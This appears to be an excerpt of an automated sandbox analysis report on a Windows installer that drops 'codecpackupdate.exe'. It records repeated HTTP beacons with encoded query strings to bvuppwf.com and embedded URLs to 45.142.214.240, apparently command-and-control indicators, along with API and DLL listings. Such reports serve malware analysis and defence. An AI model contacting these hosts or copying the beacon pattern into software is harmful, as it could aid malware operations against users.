        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: global trafficHTTP traffic detected: GET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1Host: bvuppwf.comUser-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
        Source: unknown | DNS traffic detected: queries for: bvuppwf.com
        Source: codecpackupdate.exe, 00000003.00000002.2868115063.00000000009C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.142.214.240/
        Source: codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.142.214.240/se0-
        Source: codecpackupdate.exe, 00000003.00000002.2869004771.0000000003682000.00000004.00000020.00020000.00000000.sdmp, codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.142.214.240/search/?q=
        Source: codecpackupdate.exe, 00000003.00000002.2869004771.0000000003682000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.142.214.240/search/?q=67e28dd8
        Source: codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.142.214.240/search/?q=67e28dd86d55f128
        Source: codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.142.214.240/search/?q=67e28dd86d55f128470aac1a7c27d784
        Source: codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.142.214.240/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c(
        Source: codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.142.214.240/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e9
        Source: codecpackupdate.exe, 00000003.00000002.2869086684.0000000003786000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.142.214.240/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e99282
        Source: codecpackupdate.exe, 00000003.00000002.2868115063.00000000009C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.142.214.240/search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df
        Source: codecpackupdate.exe, 00000003.00000002.2868984267.000000000363E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.142.214.240/search/?q=67e28dd86d55f128U-~
        Source: is-K7UM1.tmp.1.dr | String found in binary or memory: http://mingw-w64.sourceforge.net/X
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608178072.0000000002074000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000003.1608104571.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000002.2867895808.0000000002080000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612803679.0000000003100000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1615129214.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867870941.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612892204.000000000211C000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2868089053.0000000002128000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://vovsoft.com
        Source: 0RWRPBSuDx.tmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-MD4P1.tmp.1.dr, 0RWRPBSuDx.tmp.0.dr | String found in binary or memory: http://www.innosetup.com/
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608178072.0000000002074000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000003.1608104571.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000002.2867895808.0000000002080000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1615129214.00000000006BC000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612803679.0000000003100000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1615129214.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867870941.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612892204.000000000211C000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2868089053.0000000002128000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.openssl.org).
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608850294.0000000002088000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000003.1608714441.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-MD4P1.tmp.1.dr, 0RWRPBSuDx.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/ps
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608850294.0000000002088000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000003.1608714441.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867707898.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-MD4P1.tmp.1.dr, 0RWRPBSuDx.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/psU
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608178072.0000000002074000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000003.1608104571.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000002.2867895808.0000000002080000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612803679.0000000003100000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1615129214.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867870941.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612892204.000000000211C000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2868089053.0000000002128000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://vovsoft.com/contact/
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608178072.0000000002074000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000003.1608104571.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000002.2867895808.0000000002080000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612803679.0000000003100000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1615129214.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867870941.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612892204.000000000211C000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2868089053.0000000002128000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://vovsoft.com/contact/.
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608178072.0000000002074000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000003.1608104571.0000000002300000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.exe, 00000000.00000002.2867895808.0000000002080000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612803679.0000000003100000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1615129214.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2867870941.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000003.1612892204.000000000211C000.00000004.00001000.00020000.00000000.sdmp, 0RWRPBSuDx.tmp, 00000001.00000002.2868089053.0000000002128000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://vovsoft.com/newsletter/
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_0042ED54 NtdllDefWindowProc_A, 1_2_0042ED54
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_00423AF4 NtdllDefWindowProc_A, 1_2_00423AF4
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_00412548 NtdllDefWindowProc_A, 1_2_00412548
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_00455448 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, 1_2_00455448
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_00473A10 NtdllDefWindowProc_A, 1_2_00473A10
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_0042E6DC: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError, 1_2_0042E6DC
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exe | Code function: 0_2_0040936C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 0_2_0040936C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_00453D4C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 1_2_00453D4C
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exe | Code function: 0_2_00408330 0_2_00408330
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_0046C0D0 1_2_0046C0D0
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_00434B5C 1_2_00434B5C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_0047B0A3 1_2_0047B0A3
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_004637D4 1_2_004637D4
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_00444304 1_2_00444304
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_0045C4C4 1_2_0045C4C4
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_00430700 1_2_00430700
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_004449FC 1_2_004449FC
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_00480B58 1_2_00480B58
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_00444E08 1_2_00444E08
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_00459498 1_2_00459498
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_0043D5E4 1_2_0043D5E4
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_00465824 1_2_00465824
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_00481A30 1_2_00481A30
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_00487BD4 1_2_00487BD4
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_0042FB90 1_2_0042FB90
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_00443D5C 1_2_00443D5C
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: 1_2_00433E58 1_2_00433E58
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: 2_2_00401051 2_2_00401051
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: 2_2_00401C26 2_2_00401C26
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: 3_2_00401051 3_2_00401051
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: 3_2_00401C26 3_2_00401C26
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: 3_2_00A0E18D 3_2_00A0E18D
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: 3_2_00A0DC99 3_2_00A0DC99
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: 3_2_00A0AC3A 3_2_00A0AC3A
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: 3_2_00A08442 3_2_00A08442
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: 3_2_00A0E5A5 3_2_00A0E5A5
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: 3_2_00A12DB4 3_2_00A12DB4
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: 3_2_00A09E84 3_2_00A09E84
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: 3_2_00A14E29 3_2_00A14E29
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: 3_2_009FEFAD 3_2_009FEFAD
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: 3_2_00A2BCEB 3_2_00A2BCEB
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: 3_2_00A2BD58 3_2_00A2BD58
        Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Codec Pack Update\is-06H7C.tmp 8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: String function: 00405964 appears 101 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: String function: 00406A2C appears 38 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: String function: 00455DD4 appears 68 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: String function: 00403400 appears 59 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: String function: 00445668 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: String function: 00455BC8 appears 95 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: String function: 00433D70 appears 32 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: String function: 0040785C appears 43 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: String function: 00451CC8 appears 88 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: String function: 00408B74 appears 45 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: String function: 00403494 appears 84 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: String function: 00445938 appears 59 times
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp | Code function: String function: 00403684 appears 211 times
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: String function: 00A15330 appears 138 times
        Source: C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe | Code function: String function: 00A08AE0 appears 37 times
        Source: 0RWRPBSuDx.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: 0RWRPBSuDx.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: 0RWRPBSuDx.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
        Source: 0RWRPBSuDx.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: 0RWRPBSuDx.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: 0RWRPBSuDx.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-MD4P1.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: is-MD4P1.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows
        Source: is-MD4P1.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
        Source: is-MD4P1.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
        Source: is-MD4P1.tmp.1.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
        Source: is-K7UM1.tmp.1.drStatic PE information: Number of sections : 11 > 10
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608850294.0000000002088000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs 0RWRPBSuDx.exe
        Source: 0RWRPBSuDx.exe, 00000000.00000003.1608714441.0000000002300000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs 0RWRPBSuDx.exe
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\0RWRPBSuDx.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmpSection loaded: sfc.dllJump to behavior
